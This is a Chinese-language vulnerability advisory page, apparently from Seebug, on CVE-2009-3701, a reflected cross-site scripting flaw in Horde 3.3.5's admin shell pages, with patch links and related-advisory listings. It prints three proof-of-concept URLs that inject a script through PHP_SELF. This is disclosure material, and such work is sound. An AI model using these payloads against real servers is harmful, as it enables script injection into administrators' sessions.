Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:15130
HistoryDec 23, 2009 - 12:00 a.m.

Horde应用框架管理界面PHP_SELF参数跨站脚本漏洞

2009-12-2300:00:00
Root
www.seebug.org
10

0.033 Low

EPSS

Percentile

91.4%

JSON

BUGTRAQ ID: 37351
CVE ID: CVE-2009-3701

Horde Framework是个以PHP为基础的架构,用于创建网络应用程序。

Horde没有正确地过滤用户通过URL提交给admin/phpshell.php、admin/cmdshell.php和admin /sqlshell.php的PHP_SELF参数,远程攻击者可以通过提交恶意请求执行跨站脚本攻击,在用户浏览器会话中执行任意代码。

Horde Horde 3.x
Horde Groupware 1.2.x
厂商补丁:

Horde

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://ftp.horde.org/pub/horde-webmail/horde-webmail-1.2.5.tar.gz
http://ftp.horde.org/pub/horde-groupware/horde-groupware-1.2.5.tar.gz
http://ftp.horde.org/pub/horde/horde-3.3.6.tar.gz


                                                http://site/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
http://site/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
http://site/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>

Related

cve 1
securityvulns 3
exploitpack 1
prion 1
nvd 1
seebug 2
packetstorm 1
ubuntucve 1
cvelist 1
exploitdb 1
debian 1
nessus 5
openvas 6
osv 1
fedora 3
cve
cve
CVE-2009-3701
2009-12-21 16:30:00
securityvulns
securityvulns
[ISecAuditors Security Advisories] Horde 3.3.5 "PHP_SELF" Cross-Site Scripting vulnerability
2009-12-17 00:00:00
[SECURITY] [DSA 1966-1] New horde3 packages fix cross-site scripting
2010-01-07 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2010-01-07 00:00:00
exploitpack
exploitpack
Horde 3.3.5 - PHP_SELF Cross-Site Scripting
2009-12-17 00:00:00
prion
prion
Cross site scripting
2009-12-21 16:30:00
nvd
nvd
CVE-2009-3701
2009-12-21 16:30:00
seebug
seebug
Horde 3.3.5 ""PHP_SELF"" XSS vulnerability
2009-12-17 00:00:00
Horde 3.3.5 - "PHP_SELF" XSS vulnerability
2014-07-01 00:00:00
packetstorm
packetstorm
Horde 3.3.5 Cross Site Scripting
2009-12-17 00:00:00
ubuntucve
ubuntucve
CVE-2009-3701
2009-12-21 00:00:00
cvelist
cvelist
CVE-2009-3701
2009-12-21 16:00:00
exploitdb
exploitdb
Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting
2009-12-17 00:00:00
debian
debian
[SECURITY] [DSA 1966-1] New horde3 packages fix cross-site scripting
2010-01-07 10:33:23
nessus
nessus
Debian DSA-1966-1 : horde3 - insufficient input sanitising
2010-02-24 00:00:00
openSUSE Security Update : horde (horde-1947)
2010-02-15 00:00:00
Fedora 11 : horde-3.3.6-1.fc11 (2010-5483)
2010-07-01 00:00:00
openvas
openvas
Debian Security Advisory DSA 1966-1 (horde3)
2010-01-11 00:00:00
Debian: Security Advisory (DSA-1966-1)
2010-01-11 00:00:00
Fedora Update for horde FEDORA-2010-5483
2010-04-06 00:00:00
osv
osv
horde3 - cross-site scripting
2010-01-07 00:00:00
fedora
fedora
[SECURITY] Fedora 11 Update: horde-3.3.6-1.fc11
2010-04-01 01:40:32
[SECURITY] Fedora 12 Update: horde-3.3.6-1.fc12
2010-04-01 01:51:02
[SECURITY] Fedora 13 Update: horde-3.3.6-1.fc13
2010-04-01 17:20:56

0.033 Low

EPSS

Percentile

91.4%

JSON
Related for SSV:15130
cve1securityvulns3exploitpack1prion1nvd1seebug2packetstorm1ubuntucve1cvelist1exploitdb1debian1nessus5openvas6osv1fedora3